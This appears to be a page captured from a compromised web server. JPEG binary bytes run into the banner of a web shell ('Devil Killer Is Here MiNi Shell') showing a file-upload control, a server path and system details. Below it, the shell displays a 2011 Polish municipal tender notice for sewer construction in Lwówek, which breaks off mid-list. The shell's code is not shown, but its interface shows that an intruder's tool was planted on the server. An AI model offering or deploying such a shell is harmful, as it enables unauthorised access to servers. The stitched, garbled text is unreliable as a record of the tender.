JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110202/38523-N-2011.html

<p class="kh_header"><b>Lwówek: Budowa kanalizacji sanitarnej w Gminie Lwówek, miejscowości Bródki, Chmielinko, Józefowo (Etap Chmielinko, Józefowo), nr sprawy: RG.271.02.01.2011.ZJ</b><br>
<b>Numer ogłoszenia: 38523 - 2011; data zamieszczenia: 02.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lwówek , ul. Ratuszowa 2, 64-310 Lwówek, woj. wielkopolskie, tel. 061 4414024, faks 061 4414212.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lwowek.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej w Gminie Lwówek, miejscowości Bródki, Chmielinko, Józefowo (Etap Chmielinko, Józefowo), nr sprawy: RG.271.02.01.2011.ZJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiot zamówienia określa dokumentacja projektowa - projekt budowlany i projekty wykonawcze (udostępnione na stronie internetowej) wykonane dla zadania pn.: Budowa kanalizacji sanitarnej w Gminie Lwówek, miejscowości Bródki, Chmielinko, Józefowo (Etap Chmielinko, Józefowo), przez Autorską Pracownię Inżynierii Sanitarnej APIS z Piły, dla którego Zamawiający otrzymał decyzję zatwierdzającą projekt budowlany i udzielającą pozwolenia na budowę wydaną przez Starostwo Powiatowe w Nowym Tomyślu, decyzja nr 515/2007 z dnia 05.10.2007r., oraz decyzja nr 47/2008 z dnia 29.01.2008r., a w tym: 
- projekt wykonawczy,  kanalizacja sanitarna w gminie Lwówek miejscowości Józefowo, Chmielinko Etap I zad. 1- kolektory tłoczne - zał. nr 15 do siwz, a w tym przedmiar  I etap,
- projekt wykonawczy,  kanalizacja sanitarna w gminie Lwówek miejscowości Józefowo, Chmielinko Etap II zad. 1 - rurociąg grawitacyjny - zał. nr 16 do siwz, a w tym przedmiar II etap,
- specyfikacje techniczne wykonania i odbioru robót - zał. nr 17 do siwz, a w tym
   - ST.00.00 - wymagania ogólne, 
   - ST.01.10 - roboty pomiarowe,  
   - ST.03.10 - roboty ziemne,
   - ST.04.10 - sieć kanalizacji sanitarnej grawitacyjnej,
   - ST.05.10 -  sieć kanalizacji sanitarnej tłocznej,
   - ST.06.10 - pompownie  i tłocznie ścieków,  
- dokumentacja geologiczna - badania geologiczne w sprawie warunków gruntowo-wodnych na trasie projektowanej kanalizacji sanitarnej dla miejscowości Chmielinko - Lwówek - Pakosław - Brody - Bródki (dokumentacja wykonana w szerszym zakresie niż przewidziana do wykonania w tym postępowaniu) - zał. nr 18,   
Uwaga: 
Zamawiający uznaje, że przedstawione przedmiary robót branżowych do wykonania mają jedynie znaczenie pomocnicze i stanowią podstawę informacyjną dla Wykonawcy.

2) Przedmiot zamówienia obejmuje zakres: 
1)  Wykonanie tłoczni PS-1 (z opomiarowaniem wewnątrz tłoczni) wraz z jej zlewnią i kanałem tłocznym Lwówek-Chmielinko (SR-1÷PS-1)
- kanał graw. PCV d:200 - 1650,8mb 
- kolektor tłoczny PE 110 - 3612,2mb; 
- studnie rewizyjne betonowe 1000mm - 73szt;
- przykanaliki PCV d:160 - 494,2mb; 77szt 
- przykanaliki PCV d:200 - 4,7mb; 2szt;
- tłocznia ścieków PS-1 - Qp=5,6dm3/s= 20,1m3/h; Hp=38,0 mH2O;
2) Wykonanie przepompowni PS-2 wraz z jej zlewnią i kanałem tłocznym w Chmielinku               (PS-2÷SR-2)
- kanał grawitacyjny PCV d:200 -942,1mb
- kolektor tłoczny PE 75 -128,4mb
- studnie rewizyjne 1000mm - 31szt 
- przykanaliki PCV d:160 101,5mb /24szt;
- przepompownia ścieków PS-2 - Qp=2,8dm3/s=10,1m3/h; Hp=9,0mH2O.
3)  Wykonanie przepompowni PS3 wraz z jej zlewnią i kanałem tłocznym w kierunku wsi
Józefowo (PS-3÷T18)
- kanał grawitacyjny PCV d:200 -491,1mb;
- kolektor tłoczny PE 75 -737,6mb;
- kolektor tłoczny PE 63 - 76,4 mb
- studnie rewizyjne 1000mm - 16szt.
- przykanaliki PCV d:160 - 74,6mb/13szt 
- przepompownia ścieków PS-3 -Qp=2,8dm3/s=10,1m3/h, Hp=16,2mH2O.
- minipompownia ścieków mP-1 - Qp=1,9dm3/s=6,8m3/h, Hp=5,0mH2O

3) Zakres przedmiotu zamówienia obejmuje wykonanie sieci kanalizacyjnych do granic działek i zaślepienie rur korkiem.
4) Wyposażenie tłoczni i przepompowni w sterowniki do przesyłania danych (przesyłanie wiadomości SMS, oraz obustronna transmisja danych, oprogramowanie diagnostyczne służące do przesyłania komunikatów o stanach awaryjnych i przedawaryjnych);
- nowo budowane przepompownie oraz tłocznie ścieków opisane w projekcie budowlanym oraz w SIWZ mają być objęte rozbudową istniejącego systemu wizualizacji i monitoringu w oparciu o pakietową transmisję danych GPRS, który jest obowiązującym w ZGK Sp. z o.o. w Lwówku,
- oprogramowanie nowych przepompowni ma być zintegrowane i kompatybilne z istniejącym  systemem monitoringu,
- rozbudowę systemu należy zrealizować poprzez naniesienie nowych przepompowni ścieków na istniejącej mapie synoptycznej w Stacji Dyspozytorskiej mieszczącej się u Użytkownika, którym jest  Zakład Gospodarki Komunalnej Sp. z o.o. w Lwówku,                                                                                                                                                            - nie dopuszcza się również możliwości współdziałania dwóch czy więcej odmiennych systemów sterowania i monitoringu z uwagi na koszty przyszłej eksploatacji przepompowni sieciowych. Urządzenia i oprogramowanie należy uzgodnić z ZGK Sp. z o.o. w Lwówku.
5) Różnice w długościach pomiędzy projektem, a przedmiarem robót wynikają z faktu, iż w projekcie zaznaczono poszczególne odcinki pomiędzy środkami studni rewizyjnych, a w przedmiarze podano odległości od zewnętrznych obrysów studni rewizyjnych (dotyczy to zarówno sieci kanalizacyjnych jak i przykanalików). 
6) W zakres prac wchodzi wykonanie wszelkich robót przygotowawczych i tymczasowych: m.in. roboty pomiarowe i towarzyszące, zajęcie pasów drogowych dróg gminnych i powiatowych, w których będzie realizowana inwestycja, organizacja ruchu, roboty ziemne, odwodnienie wykopów, zabezpieczenie przeszkód napotkanych w wykopach itp.


Uwagi: 
1) Wykonanie poszczególnych zakresów z Etapu I i Etapu II obejmuje kompleksowe wykonanie tych części i wszystkich związanych z nimi robót, sukcesywnie i na bieżąco, po dokonanych odbiorach robót ulegających zakryciu, przeprowadzeniu sprawdzeń i prób należy dla danych odcinków  wykonać wszystkie roboty odtworzeniowe i porządkowe. 
2) Zamawiający na sfinansowanie przedsięwzięcia przeznacza:
- środki pochodzące z budżetu gminy Lwówek, 
oraz
- zamierza zawrzeć z Wojewódzkim Funduszem Ochrony Środowiska i Gospodarki Wodnej w Poznaniu (WFOŚiGW) umowę pożyczki na dofinansowanie przedmiotu umowy, 
a także
- zamierza uzyskać dofinansowanie z Programu Rozwoju Obszarów Wiejskich na lata 2007-2013
z działania Odnowa i rozwój wsi oraz Podstawowe usługi dla gospodarki i ludności wiejskiej.
3) W związku z zamierzeniami Zamawiającego wymienionymi wyżej,  zastrzega on sobie możliwość dokonania w każdym czasie zmian harmonogramu rzeczowo - finansowego - zał. nr 10 do siwz, 
o którym mowa § 3 ust. 2 pkt. 2) postanowień umowy (projekt umowy - zał. nr 4 do siwz), w trakcie realizacji zamówienia i wprowadzenie w jego miejsce harmonogramu, który będzie stanowił załącznik do umowy pożyczki, lub dofinansowania. 
Jeżeli zaistnieje taka okoliczność, Wykonawca będzie zobowiązany do realizacji zamówienia zgodnie ze zmienionym harmonogramem.
4) Jeżeli w dokumentacji projektowej lub w specyfikacjach technicznych wykonania i odbioru robót zostały przedstawione wskazania techniczne lub materiały z podaniem producenta, należy traktować jako przykładowe, ze względu na zasady ustawy Prawo zamówień publicznych art. 29. Oznacza to, że Wykonawcy mogą zaproponować inne rozwiązania, z zachowaniem odpowiednich, równoważnych, tj. nie gorszych niż wskazane w dokumentacji projektowej i specyfikacjach technicznych wykonania i odbioru robót, parametrów technicznych dla osiągnięcia oczekiwanej funkcjonalności całego układu, będącego przedmiotem projektu, z zapewnieniem uzyskania przez Wykonawcę i na jego koszt wszelkich ewentualnych uzgodnień, w tym także w przypadku takiej  potrzeby zgody i akceptacji autora dokumentacji projektowej i specyfikacji technicznych wykonania i odbioru robót.
5) Zamawiający obliguje Wykonawcę do zastosowania przy budowie poszczególnych elementów składowych systemu (rurociągi, przepompownie, tłocznie, osprzęt) jednakowej technologii,  jednego typu i jednego producenta, np.: 
-  jeżeli Wykonawca dokonał wyboru jednego materiału na rurociągi to musi zachować ten materiał w całym budowanym systemie; 
-  jeżeli dokonał wyboru pomp do przepompowni czy tłoczni jednego producenta, to musi zachować je we wszystkich budowanych przepompowniach czy tłoczniach; 
-  jeżeli dokonał wyboru osprzętu elektrycznego np.: styczniki  jednego producenta, to musi je zachować we wszystkich przypadkach w tej budowie).                                                                                                            5) Zamawiający zastrzega sobie prawo zmniejszenia zakresu robót z przedmiotu zamówienia do wysokości środków zabezpieczonych na to zadanie w budżecie gminy Lwówek na 2011r. (jeżeli zajdzie taka potrzeba).
6) Wykonawcy winni obligatoryjnie zapoznać się z terenem (dokonać wizji lokalnej w terenie), w którym będzie wykonywany przedmiot  zamówienia i uzyskać wszelkie niezbędne informacje do właściwego przygotowania oferty i wykonania zamówienia.
7) dokumentacja techniczna budowy kanalizacji sanitarnej proponuje przyjęcie jako podstawowej metody układania rurociągów tłocznych zastosowanie przewiertów sterowanych, w przypadku wyboru przez Wykonawcę metody wykopów otwartych musi on uwzględnić w zaoferowanej cenie wszystkie związane z tym koszty, a w nich zabezpieczenie ścian wykopów, odwodnienie wykopów, wykonanie podsypek pod układanym rurociągiem i ewentualną wymianę gruntów na trasie przeprowadzanych wykopów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego. 

1) Zamawiający, na miarę posiadanych środków zabezpieczonych na to zadanie w budżecie gminy na 2011r. i w przypadku, kiedy wartość tych środków będzie wyższa, a niżeli wartość wybranej oferty najkorzystniejszej przewiduje udzielenie zamówień uzupełniających - polegających na wykonaniu robót budowlanych w zakresie:                                                                                                                                                         wykonania sieci wodociągowej w ulicy Modrakowej Lwówek
- sieć wodociągowa PE 110 -352,5mb;
- hydrant nadziemne Dn 80 - 2szt;
- zasuwy odcinające z obudową i teleskopową oraz skrzynka uliczną - 2szt,
oraz                                                                                                                                                                  wykonania sieci kanalizacji sanitarnej w ulicy Modrakowej Lwówek
- kanał grawitacyjny PCV d:200 -215,0mb;
- studnie rewizyjne 1000mm - 5szt.
Powyższe roboty byłyby wykonywane na podstawie decyzji pozwolenia na budowę nr 709/2010 z dnia 25.10.2010r wydanej przez Starostę Nowotomyskiego, dokumentacja przedmiotowych robot w załączeniu siwz - zał. nr 20,  
oraz na;

2) Ewentualnym remoncie - wymianie sieci wodociągowej z rur azbestowo-cementowej na PE wraz z przyłączami do granic działek na odcinku równoległego przebiegu z siecią kanalizacyjną w Chmielinku będącą przedmiotem tego postępowania, w przypadku zajścia takiej potrzeby Zamawiający określa zakres ewentualnych robót do wykonania;
- sieć wodociągowa azbestowo-cementowa na PE 110 - ok. 620mb
- wymiana przyłączy wodociągowych PE 32 do granicy dz. - ok. 300mb (40 szt.).                                 Powyższe roboty byłyby wykonywane na zgłoszenie zamiaru wykonywania robót budowlanych, w oparciu o ar. 29 i art. 30 ust. 1 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz. U. z 2010r. Nr 243 poz. 1623).                                                                                                                                                  

Uwaga: wymienione wyżej zamówienia uzupełniające nie należy wyceniać w ofercie zadania podstawowego, którym jest Budowa kanalizacji sanitarnej w Gminie Lwówek, miejscowości Bródki, Chmielinko, Józefowo (Etap Chmielinko, Józefowo).

3) Jeżeli w trakcie realizacji umowy i wykonywania robót wystąpią zmiany rozwiązań technicznych równorzędne, lub polepszające funkcjonowanie układu,  od tego jakie przewiduje projekt wykonawczy do projektu budowlanego budowy kanalizacji sanitarnej,
a wartość najkorzystniejszej wybranej oferty będzie niższa, niż wartość środków zabezpieczonych w budżecie na to zadanie, a zamówienie będzie polegało na powtórzeniu tego samego rodzaju zamówień,  
lub wystąpią roboty dodatkowe niezawinione przez Wykonawcę, które nie dają się przewidzieć przed rozpoczęciem robót i na etapie projektowania i wymagają dodatkowego wynagrodzenia.
4) Wykonawca wykona zamówienia uzupełniające  jedynie na wyraźne polecenie Zamawiającego,                na podstawie dodatkowego zamówienia - dodatkowej umowy realizowanej zgodnie z art. 67 ust. 1 pkt. 6) ustawy Pzp, dla których zostanie sporządzona przez Wykonawcę wycena w oparciu o obowiązujące katalogi nakładów rzeczowych i złożoną ofertę, zgodnie z tabelą czynników cenotwórczych, jednakowych jak przyjęte w złożonej ofercie podstawowej i faktycznie przewidzianych do wykonania ilości robót (potwierdzonych przez inspektora nadzoru inwestorskiego).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.10.00.00-8, 45.23.32.20-7, 45.11.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium                                                                                                                   2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 50.000,00zł,                                               słownie: pięćdziesiąt tysięcy złotych.                                                                                                                                                                        3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:                                         1) w pieniądzu, przelewem na rachunek bankowy  95 1020 4144 0000 6702 0007 0250  w PKO BP O/Nowy Tomyśl, z adnotacją - wadium - (nazwa zadania),                                                                                                                                                                   2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,                                                                                         3) w gwarancjach bankowych,                                                                                                                                             4) w gwarancjach ubezpieczeniowych                                                                                                                   5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275), przed upływem terminu do składania ofert (tj. do dnia 22.02.2011r.), sposób przekazania: oryginał dokonania zapłaty wadium należy dołączyć do składanej oferty.                                                             4. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego, oznacza to, że przed terminem składania ofert na koncie zamawiającego muszą się znaleźć pieniądze przelane tytułem wadium.                                                                                                                                                   5. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
6. W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień, za spełnienie warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Zamawiający uzna złożenie przez Wykonawcę oświadczenia z art. 22 ust 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełnią wykonawcy, którzy : 
-  w okresie ostatnich pięciu lat przed wszczęciem postępowania (a jeżeli okres działalności jest krótszy - to w tym okresie) wykonali należycie minimum dwie roboty budowlane odpowiadające swoim rodzajem i zakresem robotom stanowiącym przedmiot zamówienia o wartości co najmniej 1.500.000,00zł netto każda i posiadają dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełnią wykonawcy, którzy: -  wykażą się niezbędnymi do wykonania zamówienia narzędziami i urządzeniami i przedstawią formę władania nimi.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełnią wykonawcy, którzy: 
-  wykażą że dysponują osobami zdolnymi do wykonania przedmiotowego zamówienia, bądź przedstawią pisemne zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia oraz dołączą wykaz podwykonawców przewidzianych do wykonania przedmiotowego zamówienia z określeniem rodzaju powierzonej części zamówienia do 
wykonania, wartości powierzonej części zamówienia i udziału procentowego w zakresie realizacji przedsięwzięcia, 
-  dysponują minimum jedną osobą (kierownikiem budowy) posiadającym uprawnienia budowlane w zakresie i specjalności objętej zamówieniem (budowy sieci kanalizacji sanitarnej, instalacji elektrycznych i budowy dróg)  - odpowiedzialnych za realizację robót, może to być jedna osoba, lub trzy niezależne o odpowiednich uprawnieniach), o których mowa w art. 14 ust. 1 pkt 4 ustawy z dnia 7 lipca 1994 roku - Prawo budowlane (Dz. U. z 2010 roku, Nr 243, poz. 1623), dysponujący aktualnym potwierdzeniem  przynależności do Okręgowej Izby Inżynierów Budownictwa, 
-  bądź przedstawią pisemne zobowiązania innych podmiotów do udostępnienia potencjału technicznego (kierownika budowy), osób zdolnych i odpowiedzialnych, przewidzianych do wykonania przedmiotowego zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełnią wykonawcy, którzy :                                                                                                   
-  posiadają opłaconą polisę, potwierdzającą, że są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż wartość przewidywanego przedmiotowego kontraktu (przedmiotowej umowy),                                                                                                                                     -  posiadają środki finansowe, lub zdolność kredytową na kwotę nie mniejszą niż wartość przewidywanego przedmiotowego kontraktu (przedmiotowej umowy).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

